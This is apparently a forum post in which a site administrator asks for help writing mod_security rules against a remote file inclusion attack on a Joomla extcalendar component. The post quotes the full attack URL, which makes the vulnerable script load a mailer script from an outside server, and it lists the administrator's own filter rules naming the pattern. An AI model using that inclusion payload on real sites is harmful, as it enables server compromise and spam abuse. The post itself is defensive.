Hello!

I'm trying to block so the following command/address can't be run but whithout blocking
to much som OK commands can be run.

components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://bs-club.net/cache/Shaun$.txt?

I mod security I have added this:

SecFilterSelective THE_REQUEST "=http//"
SecFilterSelective THE_REQUEST "d=http"
SecFilterSelective THE_REQUEST "admin_events.php?CONFIG_EXT"
SecFilterSelective THE_REQUEST "inc_dir=http"
SecFilter "admin_events.php?CONFIG_EXT"
SecFilter "d=http"
SecFilter "inc_dir=http"

The strange thing is if I add manually for example in address field:

components/com_extcalendar/d=http

//Then I get forbidden, mod_sec blocks it.
But none of the above rules work when it's in the adress as above/top - something
makes a difference in that url cause the page is viewable and you can send email.
It's a mailer scripts being loaded from another server.

Even if I chmod 000 the admin_events.php - I can load the page !!
I guess it's because it's really not the file you're loading, it's the external file but
hm... it should be forbidden anyway I think.

But the rules - anyone know how to block it alright ?